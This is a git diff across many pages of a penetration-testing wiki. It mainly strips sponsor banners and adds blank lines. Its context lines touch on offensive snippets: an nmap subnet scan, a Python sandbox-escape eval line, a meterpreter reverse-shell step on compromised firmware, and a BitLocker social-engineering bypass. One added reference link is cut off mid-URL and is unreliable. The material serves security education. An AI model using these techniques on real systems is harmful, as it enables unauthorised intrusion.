diff --git a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md index 9dcab7fc1..13d3cbfec 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/dhcpv6.md @@ -38,3 +38,5 @@ A comparative view of DHCPv6 and DHCPv4 message types is presented in the table - [https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages](https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md index fe4b7247a..695ad6a55 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/eigrp-attacks.md @@ -59,3 +59,5 @@ - `--src`: Sets the attacker’s IP address. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md index 77e1a445e..c510db636 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/glbp-and-hsrp-attacks.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ## FHRP Hijacking Overview @@ -139,8 +136,7 @@ Executing these steps places the attacker in a position to intercept and manipul - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md index fd94988fa..cea4a3541 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md +++ b/src/generic-methodologies-and-resources/pentesting-network/ids-evasion.md @@ -1,10 +1,5 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} # **TTL Manipulation** @@ -48,10 +43,7 @@ Or maybe, 2 packets with the same offset comes and the host has to decide which - [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke) -
- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index eaf5835eb..b2dec97ec 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -65,3 +65,5 @@ Ultimately, this process enables bypassing of VLAN segmentation, thereby facilit - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 72dfbfb12..e4ab393dc 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md 
@@ -53,3 +53,5 @@ LDAP is a protocol enabling the management and access of directory information o Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 02535d28b..197bb1abd 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 @@ -259,8 +256,7 @@ Moreover, probes which do not have a specifically defined **`servicewaitms`** us If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored. -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 552ff47a6..5e7063bae 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -116,3 +116,5 @@ After pinpointing IPv6 addresses associated with an organization, the `ping6` ut - [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index b0cdfb651..506bbdc22 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -132,3 +132,5 @@ In Windows you **may be able to force some privileged accounts to authenticate t - [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md index f7df86033..708620c75 100644 
--- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md @@ -31,3 +31,5 @@ To combat these threats, recommended measures include: In essence, while UPnP offers convenience and network fluidity, it also opens doors to potential exploitation. Awareness and proactive defense are key to ensuring network integrity. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md b/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md index c0c980660..a77ef8574 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md +++ b/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md @@ -35,3 +35,5 @@ The described vulnerability in WebRTC media servers arises from a **race conditi This vulnerability highlights the delicate balance in media session initialization processes and the need for precise timing and verification mechanisms to prevent exploitation. Developers are advised to implement recommended security fixes and ensure robust verification processes to mitigate such vulnerabilities. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index c7a6a26df..93f4b8d51 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -2,21 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - ## Wifi basic commands ```bash @@ -297,21 +282,6 @@ So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option c --- -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - --- ## WPA/WPA2 PSK @@ -818,19 +788,6 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md b/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md index 0c3a3285a..3cbc89b40 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md @@ -2,10 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\ Anyway, it's easy to make them work.\ 
@@ -52,9 +49,8 @@ For further details check https://versprite.com/blog/application-security/eap-tl - [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index b3920d463..9fd49877b 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -466,3 +466,5 @@ Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your emai - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md index 9d61e953c..e65e547a8 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md @@ -1,8 +1,5 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} For a phishing assessment sometimes it might be useful to completely **clone a website**. @@ -29,8 +26,7 @@ goclone #https://github.com/trustedsec/social-engineer-toolkit ``` -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md b/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md index 61179a5d6..f861914cc 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md @@ -67,3 +67,5 @@ Using this last option you can even use the field Matching Identities to see if **One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually use one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 94451778f..1e214fd8e 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -166,3 +166,5 @@ Don't forget that you cannot only steal the hash or the authentication but also - [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/README.md b/src/generic-methodologies-and-resources/python/README.md index 24aa268fb..bbad12bd5 100644 --- a/src/generic-methodologies-and-resources/python/README.md 
+++ b/src/generic-methodologies-and-resources/python/README.md @@ -2,13 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %} **Interesting pages to check:** @@ -18,12 +11,6 @@ Get Access Today: - [**Basic python web requests syntax**](web-requests.md) - [**Basic python syntax and libraries**](basic-python.md) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/basic-python.md b/src/generic-methodologies-and-resources/python/basic-python.md index 4169ddcec..8acce1e6e 100644 --- a/src/generic-methodologies-and-resources/python/basic-python.md +++ b/src/generic-methodologies-and-resources/python/basic-python.md @@ -315,3 +315,5 @@ Execution time: 4.792213439941406e-05 seconds ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md index c0b324f39..33fd3bd76 100644 --- a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md +++ b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md @@ -52,3 +52,5 @@ main() ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index c9f8a782d..f2ae94730 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} These are some tricks to bypass python sandbox protections and execute arbitrary commands. @@ -1152,12 +1145,7 @@ will be bypassed - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html) - [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md index cd57ced24..943bb1814 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md @@ -235,3 +235,5 @@ builtins['eval'](builtins['input']()) ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md index 502216e90..643f087e3 100644 --- a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md +++ b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md @@ -268,3 +268,5 @@ python-internal-read-gadgets.md - [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/) {{#include ../../banners/hacktricks-training.md}} + + 
diff --git a/src/generic-methodologies-and-resources/python/pyscript.md b/src/generic-methodologies-and-resources/python/pyscript.md index 13c9f41ef..87cee8128 100644 --- a/src/generic-methodologies-and-resources/python/pyscript.md +++ b/src/generic-methodologies-and-resources/python/pyscript.md @@ -181,3 +181,5 @@ Result: ![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md b/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md index f973c6723..ce80aac4e 100644 --- a/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md +++ b/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md @@ -42,3 +42,5 @@ Use this payload to **change `app.secret_key`** (the name in your app might be d If the vulnerability is in a different python file, check the previous Flask trick to access the objects from the main python file. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/venv.md b/src/generic-methodologies-and-resources/python/venv.md index ecfd21e1c..9cdb2ba1a 100644 --- a/src/generic-methodologies-and-resources/python/venv.md +++ b/src/generic-methodologies-and-resources/python/venv.md @@ -2,13 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ```bash sudo apt-get install python3-venv @@ -29,12 +22,6 @@ pip3 install wheel inside the virtual environment ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/web-requests.md b/src/generic-methodologies-and-resources/python/web-requests.md index fdd3b78bc..e3a2a5110 100644 --- a/src/generic-methodologies-and-resources/python/web-requests.md +++ b/src/generic-methodologies-and-resources/python/web-requests.md @@ -2,13 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Python Requests @@ -109,12 +102,6 @@ term = Terminal() term.cmdloop() ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/threat-modeling.md b/src/generic-methodologies-and-resources/threat-modeling.md index 65bc6bcf4..6a177e4c8 100644 --- a/src/generic-methodologies-and-resources/threat-modeling.md +++ b/src/generic-methodologies-and-resources/threat-modeling.md @@ -109,3 +109,5 @@ Now your finished model should look something like this. And this is how you mak ### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool) This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. + + diff --git a/src/hardware-physical-access/escaping-from-gui-applications.md b/src/hardware-physical-access/escaping-from-gui-applications.md index 414b7c0e5..222a18233 100644 --- a/src/hardware-physical-access/escaping-from-gui-applications.md +++ b/src/hardware-physical-access/escaping-from-gui-applications.md @@ -277,3 +277,5 @@ These shortcuts are for the visual settings and sound settings, depending on the - [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/firmware-analysis/README.md b/src/hardware-physical-access/firmware-analysis/README.md index bf89ab6e0..901354696 100644 --- a/src/hardware-physical-access/firmware-analysis/README.md +++ b/src/hardware-physical-access/firmware-analysis/README.md 
@@ -252,3 +252,5 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl - [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md index b6998cdb0..1f97ce83f 100644 --- a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md +++ b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md @@ -50,3 +50,5 @@ The following steps are recommended for modifying device startup configurations - [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md index c83c28790..940292f12 100644 --- a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md +++ b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md @@ -25,3 +25,5 @@ If a root shell has already been obtained through dynamic analysis, bootloader m 5. The meterpreter reverse shell can be executed on the compromised device. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/physical-attacks.md b/src/hardware-physical-access/physical-attacks.md index cf14d497b..188604ba2 100644 --- a/src/hardware-physical-access/physical-attacks.md +++ b/src/hardware-physical-access/physical-attacks.md 
@@ -54,3 +54,5 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process. {{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/interesting-http.md b/src/interesting-http.md
index 8bfee0950..629dddcb3 100644
--- a/src/interesting-http.md
+++ b/src/interesting-http.md
@@ -38,3 +38,4 @@ Never put any sensitive data inside GET parameters or paths in the URL. {{#include ./banners/hacktricks-training.md}}
+
diff --git a/src/linux-hardening/bypass-bash-restrictions/README.md b/src/linux-hardening/bypass-bash-restrictions/README.md
index b2ad89c12..6a6979672 100644
--- a/src/linux-hardening/bypass-bash-restrictions/README.md
+++ b/src/linux-hardening/bypass-bash-restrictions/README.md
@@ -2,14 +2,6 @@ {{#include ../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
-
 ## Common Limitations Bypasses ### Reverse Shell
@@ -353,14 +345,8 @@ bypass-fs-protections-read-only-no-exec-distroless/ - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) - [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) - [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0)
-- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/)
-
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %}
+- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secju {{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
index 97dbeb20d..8ddfc9ec0 100644
--- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
+++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md
@@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}}
-
-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
 ## Videos
@@ -115,10 +110,7 @@ If there is **no `read-only/no-exec`** protections you could abuse your reverse You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
-
-
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
-
-{% embed url="https://www.stmcyber.com/careers" %}
 {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md
index b73662cde..049ec17df 100644
--- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md
+++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md
@@ -93,3 +93,5 @@ Block this, EDRs. - [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec) {{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/freeipa-pentesting.md b/src/linux-hardening/freeipa-pentesting.md
index 65be42a9b..6b12cd957 100644
--- a/src/linux-hardening/freeipa-pentesting.md
+++ b/src/linux-hardening/freeipa-pentesting.md
@@ -196,3 +196,5 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking- - [https://www.youtube.com/watch?v=9dOu-7BTwPQ](https://www.youtube.com/watch?v=9dOu-7BTwPQ) {{#include ../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/linux-environment-variables.md b/src/linux-hardening/linux-environment-variables.md
index cd0898773..0b3c182a5 100644
--- a/src/linux-hardening/linux-environment-variables.md
